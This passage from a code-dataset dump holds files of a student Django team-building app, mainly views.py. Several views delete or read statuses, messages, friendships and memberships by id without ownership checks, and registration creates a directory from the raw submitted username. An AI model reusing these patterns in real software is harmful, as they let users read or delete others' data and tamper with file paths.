models.TeamReview\n\t\tfields = ['rating', 'content']\n\n\nclass UserStatusForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.UserStatus\n\t\tfields = ['content']\n\t\tlabels = {\n\t\t\t'content' : 'Post a new 
status:'\n\t\t}\n\nclass TeamStatusForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = models.TeamStatus\n\t\tfields = ['content']\n\t\tlabels = {\n\t\t\t'content' : 'Post a new status:'\n\t\t}"
},
{
"alpha_fraction": 0.6116279363632202,
"alphanum_fraction": 0.6162790656089783,
"avg_line_length": 29.785715103149414,
"blob_id": "4236fbb8c8d3c198df9e87022fe9093f0814836e",
"content_id": "134e18b75987e76fcfb0770150f87baac335f1a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 430,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 14,
"path": "/lfg_app/templates/lfg_app/message_compose.html",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "{% extends \"base_start_user.html\" %}\n\n{% block data %}\n<div class=\"context\">\n\t<h1>Message to {{ requested_reciever.first_name|title }} {{ requested_reciever.last_name|title }}:</h1>\n\t<div class=\"form\">\n\t\t<form action=\"{% url 'message_compose' requested_reciever.id %}\", method=\"POST\">\n\t\t {% csrf_token %}\n\t\t {{ message_compose_form }}\n\t\t <input type=\"submit\" value=\"Submit\">\n\t </form>\t\t\n\t</div>\n</div>\n{% endblock data %}"
},
{
"alpha_fraction": 0.7566727995872498,
"alphanum_fraction": 0.7576187252998352,
"avg_line_length": 46.406578063964844,
"blob_id": "6ace74f25886179a8ce3ed5024663498ca0e49cf",
"content_id": "e8258a8f774adca73b4e681602cdf2cc4928d3c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 63429,
"license_type": "no_license",
"max_line_length": 412,
"num_lines": 1338,
"path": "/lfg_app/views.py",
"repo_name": "vmilasin/zavrsni_rad",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.contrib.auth import authenticate, login as auth_login, logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom . import forms\nfrom . import models\nimport os\nfrom django.conf import settings\nfrom django.db.models import Q\n\n\ndef index(request):\n\tif request.method=='POST':\n\t\tlogin_form = forms.LoginForm(request.POST)\n\t\tusername = request.POST['username']\n\t\tpassword = request.POST['password']\n\t\tuser = authenticate(username=username, password=password)\n\t\tif user is not None:\n\t\t\tif user.is_active:\n\t\t\t\tauth_login(request, user)\n\t\t\t\treturn HttpResponseRedirect(reverse('user_overview', args=(user.id,)))\n\t\t\telse:\n\t\t\t\treturn HttpResponseRedirect('/teambuilder/account_disabled/')\n\t\telse:\n\t\t\treturn HttpResponseRedirect('/teambuilder/')\n\telse:\n\t\tlogin_form = forms.LoginForm()\n\t\n\tregistration_form = forms.UserRegistrationForm()\n\n\treturn render(request, 'index.html', {'login_form':login_form, 'registration_form':registration_form})\n\n\ndef registration(request):\n\tif request.method=='POST':\n\t\tregistration_form = forms.UserRegistrationForm(request.POST)\n\t\tif registration_form.is_valid():\n\t\t\ttry:\n\t\t\t\tuser = User.objects.get(username=request.POST['username'])\n\t\t\t\treturn HttpResponseRedirect('/teambuilder/registration_in_use/')\n\t\t\texcept User.DoesNotExist:\n\t\t\t\tnew_user = User.objects.create_user(username=request.POST['username'], email=request.POST['email'], password=request.POST['password'], first_name=request.POST['first_name'], last_name=request.POST['last_name'])\n\t\t\t\tnew_userprofile = User.objects.get(username=request.POST['username'])\n\t\t\t\tnew_user_userprofile = models.UserProfile.objects.create(user=new_userprofile)\n\t\t\t\tos.mkdir(os.path.join(settings.BASE_DIR, 'lfg_app', 'static', 'images', 'user_images', request.POST['username']))\n\t\t\t\treturn HttpResponseRedirect('/teambuilder/registration_success/')\n\telse:\n\t\tregistration_form = forms.UserRegistrationForm()\n\n\treturn render(request, 'registration.html', {'registration_form':registration_form})\n\n\ndef logout(request):\n\tauth_logout(request)\n\treturn HttpResponseRedirect('/teambuilder/')\n\ndef login(request):\n\tlogin_form = forms.LoginForm()\n\treturn render(request, 'login.html', {'login_form':login_form})\n\ndef registration_success(request):\n\treturn render(request, 'registration_success.html',)\n\ndef registration_in_use(request):\n\treturn render(request, 'registration_in_use.html')\n\ndef account_disabled(request):\n\treturn render(request, 'account_disabled.html',)\n\n\n@login_required\ndef start(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\treturn render(request, 'start.html', {'logged_in_user':logged_in_user, 'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 
'new_invitations_count':new_invitations_count})\n\n\n@login_required\ndef user_management(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser = logged_in_user\n\tuser_profile = models.UserProfile.objects.get(user=user)\n\n\tif request.method == 'POST':\n\t\tuser_management_form = forms.UserManagementForm(request.POST, request.FILES)\n\t\tif user_management_form.is_valid():\n\t\t\tuser.first_name = request.POST['first_name']\n\t\t\tuser.last_name = request.POST['last_name']\n\t\t\tuser.email = request.POST['email']\n\t\t\tuser_profile.birthday = user_management_form.cleaned_data.get('birthday')\n\t\t\tuser_profile.country = request.POST['country']\n\t\t\tuser_profile.city = request.POST['city']\n\t\t\tuser_profile.address = request.POST['address']\n\t\t\tuser_profile.image = request.FILES.get('image', 'default_images/default_user_img.png')\n\t\t\tuser_profile.about_me = request.POST['about_me']\n\t\t\tuser.save()\n\t\t\tuser_profile.save()\n\t\t\treturn HttpResponseRedirect(reverse('user_about_me', args=(logged_in_user.id,)))\n\telse:\n\t\tuser_management_form = forms.UserManagementForm(initial={'email':user.email, 'first_name':user.first_name, 'last_name':user.last_name, 'birthday':user.userprofile.birthday, 'country':user.userprofile.country, 'city':user.userprofile.city, 'address':user.userprofile.address, 'image':user.userprofile.image, 'about_me':user.userprofile.about_me})\n\t\n\treturn render(request, 'user_management.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'user_management_form':user_management_form})\n\n\n@login_required\ndef user_about_me(request, user_id):\n\trequested_user = User.objects.get(id=user_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\treturn render(request, 'user_about_me.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'requested_user':requested_user})\n\n\n@login_required\ndef user_overview(request, user_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_user = User.objects.get(id=user_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser_status_list = models.UserStatus.objects.filter(user=requested_user)\n\n\ttry:\t\n\t\tfriendship_request_sent = models.Friendship.objects.get(Q(user=requested_user, friend=logged_in_user) | Q(user=logged_in_user, 
friend=requested_user))\n\texcept models.Friendship.DoesNotExist:\n\t\tfriendship_request_sent = None\n\n\tif 'friendship_request' in request.GET:\n\t\tfriendship_request = models.Friendship.objects.create(user=requested_user, friend=logged_in_user)\n\t\tfriendship_request.save()\n\t\treturn HttpResponseRedirect(reverse('user_overview', args=(requested_user.id,)))\n\telse:\n\t\tfriendship_request = False\n\n\tif request.method == 'POST':\n\t\tuser_status_form = forms.UserStatusForm(request.POST)\n\t\tif user_status_form.is_valid():\n\t\t\tstatus = models.UserStatus.objects.create(user=logged_in_user, content=request.POST['content'])\n\t\t\tstatus.save()\n\t\treturn HttpResponseRedirect(reverse('user_overview', args=(logged_in_user.id,)))\n\telse:\n\t\tuser_status_form = forms.UserStatusForm()\n\n\tpaginator = Paginator(user_status_list, 5)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\t\t\n\treturn render(request, 'user_overview.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'user_status_form':user_status_form, 'user_status_list':user_status_list, 'pages':pages, 'friendship_request_sent':friendship_request_sent, 'logged_in_user':logged_in_user, 'requested_user':requested_user, 'user_id':user_id})\n\n\n@login_required\ndef del_user_status(request, status_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tstatus = models.UserStatus.objects.get(id=status_id)\n\tstatus.delete()\n\treturn HttpResponseRedirect(reverse('user_overview', args=(logged_in_user.id,)))\n\n\n@login_required\ndef user_friends(request, user_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_user = User.objects.get(id=user_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tfriends_list = models.Friendship.objects.filter(Q(user=requested_user, accepted='Y') | Q(friend=requested_user, accepted='Y'))\n\n\tpaginator = Paginator(friends_list, 10)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_friends.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'friends_list':friends_list, 'pages':pages, 'logged_in_user':logged_in_user, 'requested_user':requested_user, 'user_id':user_id})\n\n\n@login_required\ndef user_requests(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser_requests_list = 
models.Friendship.objects.filter(user=logged_in_user, accepted='I')\n\n\tpaginator = Paginator(user_requests_list, 10)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_requests.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'user_requests_list':user_requests_list, 'pages':pages, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef friendship_processing(request, request_id, accepted):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tinvitation = models.Friendship.objects.get(id=request_id)\n\n\tif accepted == '1':\n\t\tinvitation.accepted = 'Y'\n\t\tinvitation.save()\n\t\treturn HttpResponseRedirect(reverse('user_requests'))\n\tif accepted == '0':\n\t\tinvitation.delete()\n\t\treturn HttpResponseRedirect(reverse('user_requests'))\n\n\n@login_required\ndef unfriend(request, request_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tfriend = models.Friendship.objects.get(id=request_id)\n\tfriend.delete()\n\treturn HttpResponseRedirect(reverse('user_friends', args=(logged_in_user.id,)))\n\n\n@login_required\ndef user_teams(request, user_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_user = User.objects.get(id=user_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tteams_list = models.Membership.objects.filter(user=requested_user)\n\n\tpaginator = Paginator(teams_list, 10)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_teams.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'teams_list':teams_list, 'pages':pages, 'logged_in_user':logged_in_user, 'requested_user':requested_user, 'user_id':user_id})\n\n\n@login_required\ndef user_invitations(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser_invitations_list = models.Invitation.objects.filter(user=logged_in_user, accepted='I')\n\n\tpaginator = Paginator(user_invitations_list, 20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_invitations.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 
'user_invitations_list':user_invitations_list, 'pages':pages, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef invitation_processing(request, request_id, accepted):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tinvitation = models.Invitation.objects.get(id=request_id)\n\n\tif accepted == '1':\n\t\tinvitation.accepted = 'Y'\n\t\tinvitation.save()\n\t\tinvitation_team = models.Membership.objects.create(user=logged_in_user, team=invitation.team)\n\t\tinvitation_team.save()\n\t\treturn HttpResponseRedirect(reverse('user_invitations'))\n\tif accepted == '0':\n\t\tinvitation.delete()\n\t\treturn HttpResponseRedirect(reverse('user_invitations'))\n\n\n@login_required\ndef leave_team(request, membership_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tmembership = models.Membership.objects.get(id=membership_id)\n\tmembership.delete()\n\treturn HttpResponseRedirect(reverse('user_teams', args=(logged_in_user.id,)))\n\n\n@login_required\ndef user_reviews(request, user_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_user = User.objects.get(id=user_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser_reviews_list = models.UserReview.objects.filter(user=requested_user)\n\n\tpaginator = Paginator(user_reviews_list, 3)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_reviews.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'user_reviews_list':user_reviews_list, 'pages':pages, 'logged_in_user':logged_in_user, 'requested_user':requested_user})\n\n\n@login_required\ndef review_user(request, user_reviewed):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_user_reviewed = User.objects.get(id=user_reviewed)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\treview_user_form = forms.UserReviewForm(request.POST)\n\t\tif review_user_form.is_valid():\n\t\t\treview = models.UserReview.objects.create(user=requested_user_reviewed, reviewed_by=logged_in_user, rating=request.POST['rating'], content=request.POST['content'])\n\t\t\treview.save()\n\t\t\treturn HttpResponseRedirect(reverse('user_reviews', args=(requested_user_reviewed.id,)))\n\telse:\n\t\treview_user_form = forms.UserReviewForm()\n\n\treturn render(request, 'review_user.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'review_user_form':review_user_form, 'logged_in_user':logged_in_user, 'requested_user_reviewed':requested_user_reviewed})\n\n\n@login_required\ndef review_team(request, 
team_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_team = models.TeamProfile.objects.get(id=team_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\treview_team_form = forms.TeamReviewForm(request.POST)\n\t\tif review_team_form.is_valid():\n\t\t\treview = models.TeamReview.objects.create(team=requested_team, reviewed_by=logged_in_user, rating=request.POST['rating'], content=request.POST['content'])\n\t\t\treview.save()\n\t\t\treturn HttpResponseRedirect(reverse('team_reviews', args=(requested_team.id,)))\n\telse:\n\t\treview_team_form = forms.TeamReviewForm()\n\n\treturn render(request, 'review_team.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'review_team_form':review_team_form, 'logged_in_user':logged_in_user, 'requested_team':requested_team})\n\n\n@login_required\ndef user_inbox(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser_inbox_list = models.Message.objects.filter(reciever=logged_in_user)\n\n\tpaginator = Paginator(user_inbox_list, 10)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_inbox.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'user_inbox_list':user_inbox_list, 'pages':pages, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef user_outbox(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tuser_outbox_list = models.Message.objects.filter(sender=logged_in_user)\n\n\tpaginator = Paginator(user_outbox_list, 10)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'user_outbox.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'user_outbox_list':user_outbox_list, 'pages':pages, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef message_compose(request, reciever_id):\n\tlogged_in_user = 
User.objects.get(id=request.user.id)\n\trequested_reciever = User.objects.get(id=reciever_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\tmessage_compose_form = forms.MessageForm(request.POST)\n\t\tif message_compose_form.is_valid():\n\t\t\tmessage = models.Message.objects.create(sender=logged_in_user, reciever=requested_reciever, title=request.POST['title'], content=request.POST['content'])\n\t\t\tmessage.save()\n\t\t\treturn HttpResponseRedirect(reverse('user_outbox'))\n\telse:\n\t\tmessage_compose_form = forms.MessageForm()\n\n\treturn render(request, 'message_compose.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'message_compose_form':message_compose_form, 'logged_in_user':logged_in_user, 'requested_reciever':requested_reciever})\n\n\n@login_required\ndef message_read(request, message_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_message = models.Message.objects.get(id=message_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tif requested_message.read == 'N':\n\t\trequested_message.read = 'Y'\n\t\trequested_message.save()\n\n\treturn render(request, 'message_read.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'requested_message':requested_message})\n\n\n@login_required\ndef search_category(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\tsearch_category_form = forms.CategorySearchForm(request.POST)\n\t\tif search_category_form.is_valid():\n\t\t\tcategory_list = models.Category.objects.filter(category__icontains=request.POST['category'])\n\telse:\n\t\tsearch_category_form = forms.CategorySearchForm()\n\t\tcategory_list = models.Category.objects.all()\n\t\tpages = None\n\n\tpaginator = Paginator(category_list, 20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'search_category.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'search_category_form':search_category_form, 'category_list':category_list, 'pages':pages, 
'logged_in_user':logged_in_user})\n\t\n\n@login_required\ndef search_subcategory(request, category_id):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_category = models.Category.objects.get(id=category_id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tif request.method == 'POST':\n\t\tsearch_subcategory_form = forms.SubCategorySearchForm(request.POST)\n\t\tif search_subcategory_form.is_valid():\n\t\t\tsubcategory_list = models.SubCategory.objects.filter(subcategory__icontains=request.POST['subcategory'])\n\telse:\n\t\tsearch_subcategory_form = forms.SubCategorySearchForm()\n\t\tsubcategory_list = models.SubCategory.objects.filter(category=requested_category)\n\t\tpages = None\n\n\tpaginator = Paginator(subcategory_list, 20)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'search_subcategory.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'search_subcategory_form':search_subcategory_form, 'subcategory_list':subcategory_list, 'pages':pages, 'logged_in_user':logged_in_user, 'requested_category':requested_category})\n\n\n@login_required\ndef search_teams_in_cat(request, category_id, subcategory):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\trequested_category = models.Category.objects.get(id=category_id)\n\trequested_subcategory = models.SubCategory.objects.get(id=subcategory)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\n\tif request.method == 'POST':\n\t\tsearch_teams_form = forms.TeamSearchForm(request.POST)\n\t\tif search_teams_form.is_valid():\n\t\t\tteams_list = models.TeamProfile.objects.filter(name__icontains=request.POST['team'])\n\telse:\n\t\tsearch_teams_form = forms.TeamSearchForm()\t\n\t\tteams_list = models.TeamProfile.objects.filter(category=requested_subcategory)\n\t\tpages = None\n\n\tpaginator = Paginator(teams_list, 5)\n\tpage = request.GET.get('page')\n\ttry:\n\t\tpages = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\tpages = paginator.page(1)\n\texcept EmptyPage:\n\t\tpages = paginator.page(paginator.num_pages)\n\n\treturn render(request, 'search_teams_in_cat.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'search_teams_form':search_teams_form, 'teams_list':teams_list, 'pages':pages, 'logged_in_user':logged_in_user, 'requested_category':requested_category, 'requested_subcategory':requested_subcategory})\n\n\n@login_required\ndef search_teams(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, 
read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\tteam_search_form = forms.TeamSearchForm(request.POST)\n\t\tif team_search_form.is_valid():\n\t\t\tteams_list = models.TeamProfile.objects.filter(name__icontains=request.POST['team'])\n\n\t\tpaginator = Paginator(teams_list, 5)\n\t\tpage = request.GET.get('page')\n\t\ttry:\n\t\t\tpages = paginator.page(page)\n\t\texcept PageNotAnInteger:\n\t\t\tpages = paginator.page(1)\n\t\texcept EmptyPage:\n\t\t\tpages = paginator.page(paginator.num_pages)\n\n\telse:\n\t\tteam_search_form = forms.TeamSearchForm()\n\t\tteams_list = None\n\t\tpages = None\n\n\treturn render(request, 'search_teams.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'teams_list':teams_list, 'team_search_form':team_search_form, 'pages':pages, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef search_users(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = models.Friendship.objects.filter(user=request.user, accepted='I')\n\tnew_requests_count = len(new_requests)\n\tnew_invitations = models.Invitation.objects.filter(user=request.user, accepted='I')\n\tnew_invitations_count = len(new_invitations)\n\t\n\tif request.method == 'POST':\n\t\tuser_search_form = forms.UserSearchForm(request.POST)\n\t\tif user_search_form.is_valid():\n\t\t\tusers_list = User.objects.filter(Q(username__icontains=request.POST['username']) | Q(first_name__icontains=request.POST['username']) | Q(last_name__icontains=request.POST['username']))\n\n\t\tpaginator = Paginator(users_list, 10)\n\t\tpage = request.GET.get('page')\n\t\ttry:\n\t\t\tpages = paginator.page(page)\n\t\texcept PageNotAnInteger:\n\t\t\tpages = paginator.page(1)\n\t\texcept EmptyPage:\n\t\t\tpages = paginator.page(paginator.num_pages)\n\t\n\telse:\n\t\tuser_search_form = forms.UserSearchForm()\n\t\tusers_list = None\n\t\tpages = None\n\n\treturn render(request, 'search_users.html', {'new_messages_count':new_messages_count, 'new_requests_count':new_requests_count, 'new_invitations_count':new_invitations_count, 'users_list':users_list, 'user_search_form':user_search_form, 'pages':pages, 'logged_in_user':logged_in_user})\n\n\n@login_required\ndef team_creation(request):\n\tlogged_in_user = User.objects.get(id=request.user.id)\n\tnew_messages = models.Message.objects.filter(reciever=request.user, read='N')\n\tnew_messages_count = len(new_messages)\n\tnew_requests = 